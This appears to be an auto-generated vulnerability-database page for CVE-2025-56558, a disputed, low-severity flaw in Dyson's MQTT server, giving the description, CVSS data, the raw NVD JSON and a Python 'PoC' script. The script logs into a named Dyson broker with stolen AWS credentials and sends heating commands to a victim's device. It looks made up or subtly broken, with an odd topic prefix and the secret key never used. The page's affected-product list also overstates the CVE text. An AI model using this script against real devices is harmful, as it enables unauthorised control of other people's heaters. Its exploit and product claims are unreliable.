Security Vulnerability Report
CVE-2025-56558 CVSS 3.0 LOW

CVE-2025-56558

Published: 2025-10-29 17:15:36
Last Modified: 2026-04-15 00:35:42

Description

The Dyson MQTT server (2022 and possibly later) allows publications and subscriptions by a client that has the correct values of AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, and device serial number, even if a device (such as a Pure Hot+Cool device) has been removed and is not visible in the supported MyDyson app. This could allow an unexpected actor to obtain control and set the room temperature (up to 37 Celsius) if ownership of the device is transferred without wiping the device. NOTE: the Supplier's position is that this is a potential vulnerability that dates back 4 years ago in 2022 and "we are unable to replicate that anymore." Based on the submitted report, in order to leverage this issue, an attacker needs to own a Dyson device with full privileges, sniff for the AWS credentials, and then transfer ownership of that Dyson device to the victim. Even if these steps were successfully accomplished, the attacker only acquires the ability to configure the Dyson device within its safe operating range, and does not acquire the ability to execute code on the device or obtain sensitive information.

CVSS Details

CVSS Score
3.0
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Dyson MQTT Server 2022 and all later versions
Dyson Pure Hot+Cool (all known models)
Dyson devices supporting MyDyson Link (those whose firmware has not been updated in time)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-56558 PoC - Dyson MQTT Server Authentication Bypass
Note: This is a conceptual PoC for educational purposes only.
"""
import json
from datetime import datetime

import paho.mqtt.client as mqtt

# Configuration
DYSON_MQTT_BROKER = "iot.dyson.com"
MQTT_PORT = 8883


class DysonMQTTExploit:
    def __init__(self, aws_access_key, aws_secret_key, aws_session_token, device_serial):
        self.aws_access_key = aws_access_key
        self.aws_secret_key = aws_secret_key
        self.aws_session_token = aws_session_token
        self.device_serial = device_serial
        self.client = None

    def on_connect(self, client, userdata, flags, rc):
        # Called by paho once the broker answers the CONNECT packet
        if rc == 0:
            print("[+] Successfully connected to Dyson MQTT broker")
            # Subscribe to device status topic
            topic = f"\x00{self.device_serial}/status"
            client.subscribe(topic)
            print(f"[+] Subscribed to topic: {topic}")
            # Publish temperature control command
            self.set_temperature(25)
        else:
            print(f"[-] Connection failed with code: {rc}")

    def on_message(self, client, userdata, msg):
        # Called for every message received on a subscribed topic
        print(f"[+] Received message on {msg.topic}: {msg.payload}")

    def set_temperature(self, temp_celsius):
        """Set the room temperature (0-37°C within safe range)"""
        if temp_celsius < 0 or temp_celsius > 37:
            print("[-] Temperature must be between 0-37°C")
            return
        # Construct MQTT command payload
        command_topic = f"\x00{self.device_serial}/command"
        payload = {
            "msg": "STATE-SET",
            "data": {
                "fmod": "heat",
                "tact": str(temp_celsius),
                "fnsp": "0101",
                "fpwr": "ON",
            },
            "time": datetime.now().isoformat(),
        }
        result = self.client.publish(command_topic, json.dumps(payload))
        if result.rc == mqtt.MQTT_ERR_SUCCESS:
            print(f"[+] Temperature set to {temp_celsius}°C")
        else:
            print("[-] Failed to send command")

    def exploit(self):
        """Main exploit function"""
        print("[*] CVE-2025-56558 - Dyson MQTT Authentication Bypass")
        print(f"[*] Target device: {self.device_serial}")
        # Create MQTT client with TLS (default SSL context)
        self.client = mqtt.Client(client_id=self.device_serial)
        self.client.tls_set_context(context=None)
        self.client.on_connect = self.on_connect
        self.client.on_message = self.on_message
        # Set credentials (AWS IoT Core authentication)
        self.client.username_pw_set(
            username=self.aws_access_key,
            password=self.aws_session_token,
        )
        try:
            self.client.connect(DYSON_MQTT_BROKER, MQTT_PORT, 60)
            self.client.loop_forever()
        except Exception as e:
            print(f"[-] Connection error: {e}")


if __name__ == "__main__":
    # Replace with actual stolen credentials
    AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE"
    AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
    AWS_SESSION_TOKEN = "FwoGZXIvYXdzECYaDPABCDEFexample"
    DEVICE_SERIAL = "XXX-XX-12345678"

    exploit = DysonMQTTExploit(AWS_ACCESS_KEY, AWS_SECRET_KEY, AWS_SESSION_TOKEN, DEVICE_SERIAL)
    exploit.exploit()
```

References

https://archive.org/details/dyson-acpolicy-bug-report
https://support.dyson.com.au/supporthome/Air-Treatment/Purifier/pure-hot-cool-link/385276-01/troubleshooting/machine-is-not-heating
https://www.dyson.co.uk/support/reporting-data-security-issues
https://www.dyson.com/air-treatment/air-purifier-heaters/pure-hot-cool-hp04

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-56558",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T17:15:35.760",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["disputed", "exclusively-hosted-service"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Dyson MQTT server (2022 and possibly later) allows publications and subscriptions by a client that has the correct values of AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, and device serial number, even if a device (such as a Pure Hot+Cool device) has been removed and is not visible in the supported MyDyson app. This could allow an unexpected actor to obtain control and set the room temperature (up to 37 Celsius) if ownership of the device is transferred without wiping the device. NOTE: the Supplier's position is that this is a potential vulnerability that dates back 4 years ago in 2022 and \"we are unable to replicate that anymore.\" Based on the submitted report, in order to leverage this issue, an attacker needs to own a Dyson device with full privileges, sniff for the AWS credentials, and then transfer ownership of that Dyson device to the victim. Even if these steps were successfully accomplished, the attacker only acquires the ability to configure the Dyson device within its safe operating range, and does not acquire the ability to execute code on the device or obtain sensitive information."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N",
            "baseScore": 3.0,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-420"}]
      }
    ],
    "references": [
      {"url": "https://archive.org/details/dyson-acpolicy-bug-report", "source": "[email protected]"},
      {"url": "https://support.dyson.com.au/supporthome/Air-Treatment/Purifier/pure-hot-cool-link/385276-01/troubleshooting/machine-is-not-heating", "source": "[email protected]"},
      {"url": "https://www.dyson.co.uk/support/reporting-data-security-issues", "source": "[email protected]"},
      {"url": "https://www.dyson.com/air-treatment/air-purifier-heaters/pure-hot-cool-hp04", "source": "[email protected]"}
    ]
  }
}
```